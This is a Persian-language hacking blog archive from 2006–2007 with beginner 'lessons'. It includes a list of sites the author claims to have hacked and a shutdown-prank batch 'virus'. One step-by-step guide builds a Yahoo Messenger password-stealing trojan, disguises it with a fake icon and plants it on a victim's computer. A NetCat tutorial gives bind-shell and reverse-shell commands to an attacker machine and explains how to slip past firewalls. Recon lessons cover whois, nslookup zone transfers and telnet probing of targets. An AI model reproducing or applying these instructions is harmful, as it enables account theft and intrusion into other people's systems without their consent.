**** ۞۞ …هک … ۞۞ ****

تبليغات رايگان و مجاني

سلام دوستان گرامي اين موضوع هيچ ربطي به هك ندارد

يك سايت است كه تبليغات شما رابه صورت رايگان در سايت خود مي گذارد

فقط آگهي ستاره دار فقط با تبادل لينك سايت ايستگاه پيام مي باشد كه شما بايد لينك اين سايت رابه تبليغات رايگان

درايستگاه پيام فقط زود به شتابيده .

هر چه سريع عضو اين سايت شويد و قرعه كشي هم دارد و جايزه آن هم نرم افزار ارسال ايميل گروهي به تعداد

1000000

اين سايت را به دوستان خود معرفي كنيد

http://www.istgahpayam.com

+ نوشته شده در شنبه ششم مرداد 1386ساعت 10:55 توسط حمید و مرتضی |

هك سايت توسط حميد هكر

http://acolomboha.org/news/

http://www.tabukexpatdivers.com/news/

http://www.comune.bellizzi.sa.it/webwiz/news

http://www.comune.bellizzi.sa.it/webwiz/news

+ نوشته شده در جمعه بیست و هشتم اردیبهشت 1386ساعت 19:12 توسط حمید و مرتضی |

چگونه ويروس Blaster را بسازيم [نت پد]

چگونه ويروس Blaster را بسازيم [نت پد]

اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .
روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
shutdown -s -t xx -1
windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.
روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است.

فعلا بای تا های

+ نوشته شده در شنبه نوزدهم اسفند 1385ساعت 12:3 توسط حمید و مرتضی |

آموزش هک آی دی یاهو

آموزش هک آی دی یاهو با برنامه Magic-PS v1.5 SE
ما هم این اعتقاد را داریم که هک کردن کار خوبی نیست اما بعضی وقتا برای آدم ضروری میشه . به هر حال ما کاری به عواقبش نداریم و میسپاریم به خودتون هر جور که خودتون می خواهید اما اگه خواستید این کار را انجام بدید ما یک برنامه به شما معرفی می کنیم و طرز کار آن را به شما آموزش میدیم.ابتدا می بایست این برنامه را تهیه کنید .

اول یه توضیح در مورد نحوه کار این برنامه بهتون بدم:

شما توسط این برنامه یک فایل ویروسی درست میکنید و اون را برای کسی که میخواهید هکش کنید میفرستید بعد هر موقع هر کسی توی اون کامپیوتر توسط yahoo messenger وارد id خودش شد مشخصاتش برای id شما فرستاده میشه.
در این مرحله شما را با اجزای مختلف این برنامه که در شکل زیز نامگذاری شده آشنا می کنیم.

1- در این قسمت یک سری تیک وجود دارد که توضیح برخی از آنها را می دهیم و شما با توجه به میل خود می توانید آنها را انتخاب کنید.

Send Y!Mess Pass : فرستادن پسوورد آی دی طرف
SEND IP: فرستادن شماره آی پی طرف
SEND COMOUTER NAME : فرستادن نام کامپیوتر طرف
DISABLE TASKMGR : غیر فعال کردن TASK MANAGER
DISABLE Y! SAVE PASS : غیر فعال کردن سیو کردن پسوورد یاهو مسنجر طرف
DELETE MASS ARCHIVE : پاک کردن آرشیو مسیج های طرف
ENCODE PASS : تبدیل پسوورد به کدهای اختصاری و فرستادن آن برای شما
AUTO START UP : اتوماتیک فعال شدن
SEND WIN USER NAME : فرستادن یوزر نیم کامپیوتر طرف
DISABLE REGEDIT : غیر فعال کردن رجیستری طرف
DISABLE MSCONFIG : غیر فعال کردنMSCONFIG

توصیه می کنم که همه گزینه ها را فعال نکنید و فقط گزینه هایی را انتخاب کنید که طرف احساس نکند که اختلال در سیستمش بوجود آمده و تعویض ویندوز نماید. چون اینطور ممکنه که اون فایل از بین بره.

2 - در این قسمت با انتخاب تیک Fake Error Message بعد از اجرای فایل توسط طرف پیامی بهش نشون داده میشه که توی قسمت Caption عنوان ارور و قسمت Message پیام را بنویسید.

3 - در این قسمت در کادری که تعبیه شده آدرس آی دی خودتون را بدون استفاده از yahoo.com@ بنویسید.

4 - در این قسمت می تونید یه فایلی انتخاب کنید که بعد از اینکه روی فایل کلیک شد اجرا بشه. ولی بهتره کاریش نداشته باشید.

5 - اینجا هم که می تونید یه Icon مناسب برای فایلتون انتخاب منید تا کسی شک نکنه.

6 - و بلاخره رسیدیم به مرحله ای که فایلمون را بسازیم پس وقت را تلف نکنید و روی دکمه Create MPS کلیک کنید وهمون جائی که خود برنامه وجود داره دنبال فایل ساخته شده بگردید.

خوب از اینجا به بعدش دیگه بستگی به خودتون داره که به هر نحوی شده این فایل را برای طرف بفرستید. حالا یا می تونید توسط اینترنت بفرستید یا اینکه مستقیما از روی سی دی یا فلاپی توی هارد کامپیوترش و یه جایی مخفی کنید. توی کافی نت راحتتر میشه این کار را انجام داد.

تا آموزش های ویژه بعدی خدانگهدار. لطفا ما را از نظرات گرمتون بی دریغ نگذارید.

+ نوشته شده در شنبه بیست و یکم بهمن 1385ساعت 9:53 توسط حمید و مرتضی |

آموزش کامل NetCat

جلسه هفتم :( آموزش کامل NetCat )

نت کت یکی از محبوبترین و پرکابردترین برنامه ها توسط هکرها می باشدبرای همین از نت کت به عنوان چاقوی همه کاره هم یادمی شود.درصورت باز بودن یک پورت روی سیستم شما ، شخص مهاجم یا هکر به راحتی می تواند از طریق نت کت به آن نفوذ کند.
نت کت برنامه ای است که درعین سادگی و کم حجمی دربسیاری ازحملات نفوذی حتی در سطوح خیلی پیشرفته مورد استفاده هکران قرار می گیرد کاراصلی که این برنامه برای یک هکر انجام می دهد این است که data ها را برروی پورت های باز بین دو کامپیوتر انتقال می دهد.
نت کت اولین بار توسط Hobbit برای نسخه های مختلف یونیکس ازجمله Linux و ... نوشته شده ودرسال 1996 منتشرشده است و بالا خره دراواخر سال 1998، Weld pond نسخه ای برای ویندوز NT را اینجاد نمود.
یکی ازقابلیت های جالب این برنامه را میتوان به ارتباط ازپورتی به پورت دیگریاد کرد.
نکته : «این برنامه قابلیت ارتباط دوطرفه رو داراست - Listener و Clients - چه روی پورت TCP چه UDP»
خوب حالا قبل از شروع توضیحات درمورد دستورات باید با دو تا تعریف آشنا شوید.
سرویس گیرنده :
می تواندازطریق یک درگاه به کامپیوترموردنظر وصل شودو اطلاعاتی راازاین طریق ارسال کند.
سرویس دهنده :
هردرگاهی موردنظرشماباشدرابازکرده و منتظردریافت اطلاعات می شود.
NetCat برای انتقال اطلاعات :
یکی ازعامیانه ترین و ساده ترین امکاناتی که نت کت به شما می دهد انتقال فایلها می باشد.این برنامه قادر است یک فایل رابین دوکامپیوتربه راحتی منتقل کند.نت کت ازمفیدترین و سودمندترین ابزارها برای انتقال ، اطلاعات است . درصورتی که نت کت برروی یک کامپیوتربه صورت سرویس دهنده فعال باشد می توان ازطریق یک پورت ، اطلاعات را انتقال داد.
طرز انتقال اطلاعات :

nc -l -p 1234 >file
NC = اجرای برنامه
l- = حالت سرویس دهنده
p 1234- = شماره درگاه (پورت)
[File] = محل ذخیره داده هاارسالی

[fileِفایل] > nc [remot machine] 1234
NC - اجرای برنامه
[remot machin] = نام کامپیوتر هدف (آی پی)
1234 = شماره پورت مورد نظر
[file] = اطلاعات با این اسم استخراج می شه

نکته درمورد < : « درصورتی که این علامت اسم یک فایل باشد به عنوان دستگاه خروجی مشخص می شود واطلاعات دریافت شده درون آن قرار می گیرند،درصورتی که اینکارصورت نگیرد اطلاعات برروی صفحه نمایش نشان داده می شود. »

NetCat و پویش ها (یافتن پورت های باز اعم از UDP & TCP ) :
یکی از بهترین و پرکاربرد ترین توانایی این برنامه قدرتمند جستجو کردن و یافتن درگاه های بازبرروی کامپیوتر مورد نظر می باشد.این برنامه به صورت سریع و به راحتی با IP مورد نظر ارتباط برقرار می کند.
نکته : « این برنامه ازتکنیک پویش پورت ها به صورت Vanilla که یک استاندارد می باشد،پشتیبانی می کند. »

echo QUIT nc -v -w 3 targetmachine startport endport
QUIT = این چهار کاراکتر به هر پورت بازارسال می شود
NC = اجرای برنامه نت کت
v- = خروجی Verbose برای نشان دادن درگاه های باز برروی صفحه نمایش
w 3- = در3 ثانیه به هر جورت یک پیغام می فرستد و منتظرمی شه که این پیغام برگرده و معلوم بشه ان درگاه باز است یا بسته است
target machin = نام کامپیوتری(آی پی) که نت کت روی اون می خواهد اسکن بزنه
start port , end port = در اینجا شما تعیین می کنید که ازچه درگاهی تا چه درگاهی اسکن بزنه
NetCat و اینجاد ارتباط با یک درگاه باز و ارسال داده :
بعد از یافتن یک درگاه باز برروی کامپیوترهدف می توان ازاین برنامه جهت انتقال اطلاعات ( فایل ) استفاده کرد.
ارتباط و انتقال تحت درگاه های TCP :

nc remotemachine portnumber
NC = اجرای برنامه روی کامپیوتر مبدا
rempotemachine = نام کامپیوتر (آی پی)
portnumber = درگاه باز
ارتباط و انتقال تحت درگاه های UDP :

nc -u remotemachine portnumber
NC = اجرای برنامه
u- = انتخاب پروتکل ارتباطی UDP
remotemachine = نام کامپیوتر(آی پی) هدف
portnumber = درگاه باز

NetCat و اجرای دستورات ازطریق خط فرمان :
یکی ازقابلیت های بسیار عالی که به درد نفوذگر می خوره این هست که می تونه یک فایل یا ... از راه دور اجرا کنه . (برای مثال شما یک تروجان مثل ساب سون رو برای کامپیوتر هدف می فرستید و بعد هم اجراش می کنید)

nc -l -p [port] -e/bin/sh
nc = اجرای برنامه نت کت
l- = حالت سرویس دهنده
p port- = شماره درگاه مورد نظربرای ارتباط
e/bin/sh- = آدرس برنامه ای که بعد از برقراری ارتباط باید اجرا بشه.

nc victimmachine portnumber
nc = اجرای برنامه
victimmachine = آدرس آی پی ماشین قربانی
portnumber = شماره پورت مورد نظر برای برقراری ارتباط ازطریق پروتکل TCP
دراین حالت نت کت برروی کامپیوتر قربانی درحالت انتظار باقی می ماندتانفوذگرشروع به ارسال کند.

NetCat و ایجاد نفوذ برروی کامپیوترموردنظردرحالت فعال :

nc [attacker machine] [port] -e/bin/sh
nc = اجرای برنامه
attacker machine = آدرس آی پی کامپیوتر نفوذگر
port = شماره درگاه مورد نظر
e/bin/sh- = نام فایلی که بعد از اینجاد ارتباط ، اجرا خواهد شد.

                                                                                                               nc -l -p port
nc = اجرای برنامه
l- = حالت سرویس دهنده
p port- = شماره پورت مورد نظر
با کمک این روش شما می توانید ازدیوار آتش به راحتی عبور کنید. به این دلیل که دیوار آتش سعی می کنه که ازورود اطلاعات از بیرون به داخل جلوگیری کنه ولی برعکس این موضوع رو به درستی پوشش نمی ده!
تذکر: تمام علامت های [ ] که درمتن بالا به کا برده شده در فرمول وجود ندارد و فقط برای تفکیک بهتر نوشته هاست.
جوابیه : دوستان فرموده بودند که تاریخ آپ بعدی رو براشون اعلام کنم راستش این برای من امکان نداره ولی قول میدم هفته ای 2 - 3 تا آپ کنم . بازم پرسیده بودند که آیا این آموزش هایی که من میدم رو باید تو لینکس یا 2000 حتما انجام داد که جواب ایشون اینه که چون سطح این آموزش ها فعلا مبتدی می باشد نیازی به لینکس نیست و همون ویندوز رو استفاده کنید ولی به جای ایکس پی بهتره با 2000 کار کنید که راه بیوفتید .
خوب دوستان اینم از این آموزش از اینکه خیلی دیر آپ کردم منو ببخشید ولی خداییش خیلی کار داشتم که همش نا تماموم مونده بود ولی قول میدم که آپ بعدی خیلی زود باشه ولی تا من نظرات شما را نبینم و مطمئن نشم که کسی داره از این مطالب استفاده میکنه آپ نمی کنم پس حتما یک نظر بدید حتی یک کلمه ممنون فعلا بای تا های.

+ نوشته شده در سه شنبه سوم بهمن 1385ساعت 10:16 توسط حمید و مرتضی |

TCP و UDP

جلسه ششم :(TCP و UDP)

سلام دوستان ازاینکه یه کم دیر آپ کردم منو ببخشید . خواهش میکنم منو از نظرات خودتون بی بهره نذارین .

خوب درس این جلسمون خیلی مهمه میخواهیم درباره پورت ها بیشتر بحث کنیم و به انواع آن اشاره ای داشته باشیم دوستان مباحث مربوط به آی پی و پورت خسته کننده و طولانی هستند ولی باید این را بدانیدکه 30 درصد هک و شاید هم بیشتر هک همین دو مبحث بنابراین همین جوری از کنارشود عبورنکنید.

TCP و UDP چیست؟

مدل TCP/IP که برای ارتباط اینترنتی به کارمی رود،می توان به لایه های مختلفی تقسیم بندی کرد،اما یکی از این لایه ها،لایه ارتباط host2host است که خودشامل دوپروتکل است به نامهای TCP و UDP :

1- (Transmission Control Protocol) مخفف TCP:

این پروتکل قوی تروقابل اعتمادتراست واصولاپروتکل مهمتری نسبت به UDP محسوب می شود. این پروتکل توانایی بازبینی بسته ها و کنترل خطا راهم دارد.

۲- (User Datagram Protocol) مخفف UDP:

این پروتکل برای کاهش overflow طراحی شده است ودرخیلی ازموارد وابسته به TCP است.

نکته مهم این است که وقتی با یک پورت خاص روی یک کامپیوتردیگرارتباط برقرار می کنیم ، این ارتباط می تواند ازنوع TCP یا UDP باشد . بنا براین وقتی میخواهیم یک کامپیوتر خاصی را ازنظرپورت ها بررسی کنیم هردوباید بررسی شود.

تقسیم بندی پورت ها ازروی شماره آنها :

1- پورت های 0 تا 1023 :

مشهورترین پورت ها هستند و معمولا هرکدام برای یک سرویس خاص استفاده می شود.با تعدادی از این پورت ها درجلسات قبل آشنا شده اید.

2- پورت های 1024 تا 49151 :

این سری ازپورت ها مشخصا با هیچ یک ازسرویس های اینترنتی مرتبط نیستند بلکه وقتی که با یک ابزار شبکه مانند مرورگر اینترنت (مثل Internet Explore یا Netscape) ، نرم افزار ارسال و دریافت E-Mail (مثل Outlook یاEdura) ، نرم افزار های FTP (مثلWS-FTP یا Cute-FTP) کار می کنید،یکی از این پورت ها به صورت random بازشده ویک ارتباط با سرور(با توجه به نوع سرویس اینترنتی که می دهد که یکی ازپورت های 0تا1023است) برقرار شده و داده ها ارسال و دریافت می شوند. یعنی پورت شما یکی از پورت های این قسمت است و پورت سرور یکی از پورت های بالایی.این سری پورت ها را پورت های register شده هم می گویند.

3- پورت 49152 تا 65535 :

این سری ازپورت ها به ندرت استفاده می شوند. کاربرد اساسی آنها یک سری سرویس های خاص اینترنتی است ویا توسط trojan ها (که برای Hack کردن کامپیوتراست) است .البته خیلی ازtrojan های معروف ازپورت های ردیف2هم استفاده می کنندو این تقسیم بندی هاهمیشه برقرار نیست و به همین علت است که گاهی پورت ها را به دودسته زیر1024وبالای 1024 تقسیم می کنند.

درجلسات قبل به شما چند تا ازپورت های مهم را معرفی کردم . حالایک لیست کامل تررا دراین درس میگم .

دقت کنید درس امروز هیچ بحثی درمورد تروجان ها نمیکند زیرا تروجان های شناخته شده هم یک سری پورت پیش فرض دارند که درجای خود بحث خواهد شد.

چگونه به یک پورت Telnet کنیم ؟

برای اینکه عملکردیک پورت برای شما روشن شود ، باید به آن پورت Telnet کنید.(البته معمولا تعدادی ازپورت هایی را که ممکن است اطلاعاتی مهم را دراختیار هکرها قراردهند مثل پورت 79 معمولا بسته است وارتباط با آنها شاید برقرار نشود.)برای Telnet کردن درPrompt command دستور telnet hostname protnum را تایپ کنید بدین صورت که به جای hostname شماره ip ویا نام سایت را وارد می کنید و به جای portnum شماره پورت و یا معادل آن ازجدول . مثلا برای تلنت کردن به پورت 13 که ساعت و تاریخ را به دست می دهد در کامپیوتری به اسم www.iums.ac.ir می نویسید:

telnet iums.ac.ir 13

telnet iums.ac.ir daytime

هردواین دستورات معادل هم هستند.

تلنت کردن معمولا اولین کاری است که یک هکربرای هک کردن بک سایت انجام می دهد،زیرا بعضی از پورت هادرصورت بسته نبودن روی آن سرور،معمولا حاوی اطلاعات بسیار مهمی هستند.

همین الان شروع کنید و مثل یک هکر واقعی به کامپیوترهای مختلف وپورت های گوناگون تلنت کنید.

خوب دوستان درس این جلسه هم به سلامتی تموم شد خسته نباشد مطالبی رو که مطالعه فرمودید تمامشون عینا برای استاد آراز صمدی بود امید وارم که خوشتون آمده باشه و استفاده کرده باشید راستی اگه درمورد تلنت یا نت کت مشکل داشتین نگران نباشید در درس بعد آموزش تلنت و بعد هم نت کت رو به طور کامل میدهم. با نظراتتون بنده رو بیشتر راهنمایی کنید،ممنون. فعلا بای تا های.

+ نوشته شده در شنبه بیست و سوم دی 1385ساعت 20:38 توسط حمید و مرتضی |

دستور nslookup

دستورnslookup

جلسه پنجم :(دستورnslookup)

خوب دوستان سلام خسته نباشید امیدوارم تا اینجای کارازمطالب استفاده کرده باشید از اینکه دیرآپ میکنم منو ببخشید مدتیه که سرم شلوغ شده ولی نگران نباشید چون در اینجا به کارخودم ادامه می دهم ازنظراتتون هم ممنونم .

دردرس جلسه قبل بهتون بدست آوردن DNS Server یک سایت را آموزش دادم وگفتم که این آدرس کاربردزیادی داره ولی چیزی درمورد کاربرد این آدرس نگفتم دراین آموزش بهتون یاد میدم که چگونه با همین آدرس DNS Serverاطلاعات بسیار مفیدی بدست بیاورید.

چگونگی استفاده ازnslookup :

وقتی که DNS Server یک سایت را از طریق whois که قبلا آموزش دادم بدست آوردید.می توانید از این دستور استفاده کنید.

اول برایتان راه اصلی و به قول معروف فرمول اصلی را توضیح میدهم بعد مثل همیشه برایتان یک مثال عملی همراه با شکل میزنم که خوب یاد بگیرید.

1- Prompt command را باز کنید (برای باز کردن Prompt command وارد منوی Start شوید و ابزارRun را انتخاب کنید ودرکادر آن تایپ کنید cmd بعد پنجره ای سیاه رنگ شبیه به محیط داس باز میشود که همان صفحه Promt command مورد نیاز ماست . راههای دیگر برای باز کردن این پنجره را در درس های قبل توضیح دادم ) ودر آن تایپ کنید nslookup بعد از تایپ این دستور و زدن اینتر چند سطر نوشته ظاهر میشود ودر آخر این علامت دیده میشود < این علامت یعنی اینکه شما میتوانید ادامه دستورات را وارد کنید.

2- در جلوی این < علامت تایپ کنیدserver dns_server بجای dns_server باید آدرس دی ان اسی که بدست آوردید را وارد کنیدبعد از اینتر به شما دو سطر نشان داده میشود که در سطر اول آدرس دی ان اس همان سایت است و در سطر دوم آدرس یک آی پی اگر در این مرحله نتوانستید به این قسمت برسید و با یک ارور مواجه شدید از آدرس دی ان اس دومی که دارید استفاده کنید.

3- حالا دستور set type=any را دقیقا به همین شکل وارد و اینتر کنید.

4- حالا به کمک دستور .ls -d site_name میتوانید اطلاعات را بدست آورید که باید به جای site_name آدرس آن سایت را بدون www وارد کنید ، توجه داشته باشید که درآخر دستور یک نقطه نیز وجود دارد و باید آن را هم تایپ کنید.

خوب بعضی از اطلاعات بدست آمده همانطور که مشاهده میکنید قابل درک و فهم هستند ولی بعدا درمورد تک تک اینها صحبت خواهم کرد.

5- دستور exit را مقابل < تایپ کرده و ازnslookup خارج شوید.

شما این کار را روی چند سایت امتحان کنید که خوب یاد بگیرید.

برای شما مثالی عملی از دستور nslookup میزنم در این مثال من میخواهم از سایت www.khordad.com یک سری اطلاعات بگیرم و nslookup را روی آن امتحان کنم .

اول باید با استفاده از whois آدرس دی ان اس سرورش را بدست آورم پس طبق آموزش های قبل مراحل را انجام میدهم :

اول وارد www.samspade.org/t/whois?a=khordad.com میشوم :

حالا وارد cmd میشوم و دستورات را که درشکل هم توضیح داده شده اجرا میکنم:

خوب همانطور که ملاحظه می فرمایید توانستیم با استفاده از دستور nslookup به یک سری اطلاعات مفید از سایت خرداد دست پیدا کنیم.

خوب دوستان جسله پنجم هم به پایان رسید امید وارم که توانسته باشم مفهوم اصلی را برای شما بیان کنم و از خدا میخواهم که قدرت بیان مرا قوی تر کند تا بتوانم به شما اطلاعات را کاملتر وساده تر برسانم ازهمتون برای اینکه این قدر به من لطف دارید ممنونم تا پست بعدی که انشالله به زودی میدم بای

+ نوشته شده در جمعه پانزدهم دی 1385ساعت 10:27 توسط حمید و مرتضی |

تکمیل مبحث Whois

جلسه چهارم:(تکمیل مبحث Whois)
سلام دوستان عزیز درآموزش امروز میخوام براتون روش پیدا کردن IP سایت هاروبااستفاده ازwhois به طور کامل توضیح بدم .
اگراین سوال برایتان ایجاد شده که اصلا هوایزچیست باید به شما بگویم که یک تعریف کلی برای whois نمی توان ارائه کرد ولی فعلا منظور ما از whois همان کسب اطلاعات درمورد یک سایت است . در آموزش جلسه سوم نوع خاصی از whois روتوضیح دادم که برای تبدیل domain به IP بود.
حالا میخواهیم با استفاده از این دستور یک سری اطلاعات بدرد بخوراز آن IP یا همان domain بدست بیاوریم مثلا اگه بخواهیم درمورد یک سایت علاوه برآی پی اش اطلاعات دیگری بدست آوریم باید همان طور که قبلا هم گفتم به اینترنت متصل شویم و به طریقی به یک سری سایت های خاص که وظیفه ثبت domain,...رادارند متصل شویم و از آنها بخواهیم که اطلاعات مربوط به آن سایت را به ما بدهند . این سایت های خاص database(بانک های اطلاعاتی)ویژه این وظایف را دارند.برای کسب این اطلاعات ازروش هایی که توضیح میدهم می توانیداستفاده کنید:

انواع راه های whois:
1- برای کسانی که ازطریق سیستم عامل یونیکس یا لینوکس به اینترنت وصل شده اند،دستوری به اسم whois درآنها وجوددارد. البته از نزم افزار های خاصی که برای این سیستم عامل ها وجود مثل (Xwhois) نیز میتوانند استفاده کنند.ولی این دستوردرویندوز وجود ندارد و از آنجا که من آموزش قدم به قدم هک رو شروع کردم و سطح این آموزش ها فعلا در سطح مبتدی است و کمتر کسی با این سیستم عامل ها آشنایی دارد بیشتر صحبتم را به سیستم عاملی که اکثرا استفاده میکنند یعنی ویندوزاختصاص می دهم.
2- برای whois کردن درویندوزنرم افزارهای زیادی وجودداردازمشهورترین این نرم افزارها می توان به Netscan tools و SamSpade اشاره کردولی بازهم چون پیدا کردن این نرم افزار ها کمی مشکل میباشد و این آموزش باید طوری باشد که تمام برنامه های مورد نیازرا همه دراختیار داشته باشنداز این ها هم دیگر صحبت نمی کنم تا شما با جزئیات این کارآشنا شوید.
3- روشی که میخواهم توضیح دهم و از آن دراین جلسه استفاده کنم استفاده از سایت هایی است که این جستوجو را برای ما انجام می دهند.
database های whois درچه سایت هایی وجوددارد؟
البته در این مورد سایت های زیادی وجود دارد که من برای شما به چندتا از سایت های معروف اشاره میکنم این سایت ها به شرح زیر می باشند:

اولین سایت مشهورترین سایت ثبت domain برای com , net , org است .
سایت های مختلفی عمل ثبت domain را انجام م دهند و برای اینکه درمورد یک سایت خاص اطلاعاتی کسب کنیم باید اطلاعات مربوطه را ازآن سایتی بگیریم که ثبت domain راانجام داده است و چون این کار مشکلی است به جای استفاده از خود سایت های بالایی ازسایت هایی دیگری استفاده می کنیم که این کاررا برای ما ساده تر می کنند،خود آن سایت ها درنهایت اطلاعاتشان رااز سایت های اصلی می گیرندوفقط نقش واسطه دارند .
یکی از بهترین سایت ها که هم مورد علاقه من هست و هم مورد علاقه خیلی ازدوستان من سایت زیرمیباشد:
http://www.samspade.org/t/whois?a=XXXXXXXXX
که به جای XXXXXXXXX آدرس سایت ویا Ip آنرا مینویسیم ، برای درک بهتر این دستور یک مثال عملی می زنم در این مثال من میخواهم علاوه بر بدست آوردن Ip سایت persianblog اطلاعات مفید دیگری مثل دی ان اس سرورش ،آدرس آی اس پی اش و شخصی که به عنوان مدیر شبکه یا ادمین کار ثبت را انجام داده است و .... بدست آورم :
برای این کار در مرورگر خودم آدرس زیر را تایپ میکنم :
http://www.samspade.org/t/whois?a=persianblog.com
و همان طور که درشکل ملاحظه میکنید به اطلاعات زیر میرسیم :

بعدا درمورد این آدرس ها (دی ان اس سرور و دامین سرور) توضیح میدهم فعلا فقط طریقه بدست آوردن این آدرس ها راباید یاد بگیرید.
یک سری نکات مهم درمورد دستورwhois:
دربالا و در درس قبل درمورد ip whois و dns whois صحبت کردم . بحث dns whois (کسب اطلاعات درمورد یک domain خاص)رو ادامه می دهم .
ازسایتsamspadeاستفاده کردم.اگراین whoisروتست کرده باشید،می دانیدکه برای یک سری ازdomain(دامنه)ها ، جواب نمی دهد.مثال آن سایت هایی است که دارای دامنه جغرافیایی مثلا ایران هستند ، درمورد دامنه های جغرافیایی ایران باید گفت که به ir. ختم می شوند (مثلا:neda.net.ir).مثال دیگری که در whois سایت samspade کارنمی کند،تعدادی ازدامنه های com , org , net هستند که درinternic.net ثبت نشده اند،بلکه درdomainpeople.com ثبت شده اند(مثلا sanjesh.org) . چندسال پیش ثبت domainهایی که درگروه com,net,org بودند،مختص به internic.net بودولی الان دیگراینطور نیست.
کاری که شما بایدبرای whoisکردن بایدانجام دهید،توجه به نوع آنdomainاست که ازنوع com است یا ir است یاbizاست و... بعد از آن از یکی از سایت های زیراستفاده کنید:
1- internic.net:
برای com,net,org,edu عالی است . برای aero,arpa,biz,coop,info,int,museum هم می تواند استفاده شود.
صفحه وب مربوطه عبارت است ازwhois_nic=xxxxxxxx&http://www.internic.net/cgi/whois?typej=domain که به جای xxxxxxxx مثلا باید بنویسید:blogfa.com
2- nic.ir:
برای ir استفاده می شود.
صفحه وب مربوطه عبارت است ازhttp://whois.nic.ir
3- http://www.tv/:
برای tv,biz,info,ccعالی است.
صفحه وب مربوطه عبارت است ازhttp://www.tv یا می توانید مستقیما درمرورگربنویسید:
tld=zzzz&http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/whois.cgi?domain=yyyyyy
که اگربخواهیم مثلا hack.tv را whois کنم به جای yyyyyy باید بنویسیدhackوبه جایzzzzباید بنویسید tv
4- domainpeople.com:
برای biz,name,com,net,org,info عالی است .
صفحه وب مربوطه عبارت است ازhttp://whois.domainpeople.com
همانطورکه ملاحظه میفرمایید،com,net,org در1و4 مشترک است.علت آن است که بعضی ها دراولی و بعضی ها درچهارمی ثبت می شوند ولی برای whoisکردن فرقی نمی کنه که شما از اولی استفاده کنید یا چهارمی هم دیگرروساپورت میکنند.
خوب دوستان جلسه چهارم هم تموم شد ازاینکه دیر آپ کردم منو ببخشید سرم یه چند روزیه که خیلی شلوغ شده جلسه بعدی رو با nslookup شروع میکنم ،میخواستم در همین جلسه پرونده nslookup هم ببندم ولی گفتم شاید مطالب رو با هم قاتی کنید و به عبارتی قات بزنید.راستی مطالبی که امروز خواندید اولش از خودم بود ولی درادامه بیشتر مطالب ازاستاد بزرگ آراز صمدی عزیزبود . فعلا بای

+ نوشته شده در دوشنبه یازدهم دی 1385ساعت 21:25 توسط حمید و مرتضی |

Command Prompt و ادامه IP

جلسه سوم : (Command Prompt و ادامه IP)
سلام دوستان عزیزم امیدوارم که حالتون خوب باشه و تا اینجای آموزش ها رو خونده باشید و ازشون استفاده کرده باشید.خوب عزیزان چون درجلسه قبل مقدمه IP روشروع کردم و برای چک کردن آی پی باید به CMDمیرفتیم بهتر دیدم که درباره Command Prompt یا همان CMD یه کم توضیح بدم چون از این به بعد بیشتر کارامون در محیط سیاه رنگ CMDانجام میشود.
Command Prompt را خط فرمان ویندوز نیز می گویند برای باز کردن آن به 2راه ساده اشاره میکنم:
1-درویندوز خود به مسیر زیر بروید :
Start---->Programs---->Accessories---->Command Prompt
2- این راه راحت تر است : طبق آموزش قبلی از داخل Startپنجره Runرا باز کنید ودرون آن تایپ کنید cmdواینتر را بزنید میبینید که یه صفحه سیاه رنگ باز میشود که در نوار آبی رنگ بالایش نوشته Command Prompt.
خوب دوستان برای Command Prompt دیگه توضیح بیشتری رو نمیدم که گیج نشید همین اندازه کفایت میکنه ، یکی از کاربرد های اصلی این برنامه پیدا کردن آپی Victim(قربانی)یا شخصی که میخواهیم بهش حمله کنیم میباشد.شما باید بدانید که اولین مرحله ازFootprinting(جمع آوری اطلاعات از قربانی رامی گویند)پیدا کردن IPاون هدف میباشد.
پیدا کردن IP یک سایت (پیدا کردن IP سرور) :
برای این کار روشهای مختلفی وجود دارد که من به بیشترشون که کارامد ترند میپردازم :
1- دوستان این روش رو فقط برای دانستن و کامل نمودن اطلاعاتتون بهتون یاد میدم ولی هیچ وقت ازش استفاده نکنید علتشم اینه که اکثراغلط از آب در میاد خودتون میتونید امتحان کنید ببینین که درست میگم یا نه .این روش به این صورته که در Internet Explorer خود آدرس آن سایت را که میخواهید IPشو پیدا کنین بزنید و اینتر کنید .درقسمت پایین مرورگر Internet Explorer خود یعنی Status Bar پس از چند لحظه برای مدت کوتاهی IP نمایش داده میشود (شکل آی پی رو در درس قبلی توضیح دادم) ومی توانید آن را یاد داشت کنید ولی اکثرا این آی پی که نمایش داده میشود در عرض چند ثانیه میرود برای همین شما میتوانید از صفحه مرورگر خودتان با زدن کلید Print Scrren که روی کیبردتان وجود دارد عکس بگیرید و در paint ذخیره کنیدش حالا میتوانید آی پی رو راحت بخونید . ولی همان طور که گفتم این راه راهه خوبی نیست چون تقریبا هیچ جا جواب نمیده یعنی آی پی که به ما میده غلطه و اکثرا درمورد سایت های بزرگ مثل یاهو و ... جواب نمیده پس فقط این راه رو بلد باشین که کم نیارین همین.
2- دستور Ping را در Command Prompt صادر کنید(حول نشید میگم چه طوری)
فرمول کلی دستور ping به این صورت میباشد : ping domain به جای domain باید آدرس سایت مورد نظر رو تایپ و اینتر کنید(domain هادرواقع همان آدرس های اینترنتی میباشند )
برای درک بهتر و برای اینک کار با پینگ رو یاد بگیرید برای شما مثالی عملی میزنم :
مثلا اگه من بخواهم آی پی سایت یاهورا پیدا کنم باید وارد Run شوم و تایپ کنم cmd و سپس پس از ظاهر شدن صفحه سیاه Commad Prompt در آن به صورت زیر عمل کنم :
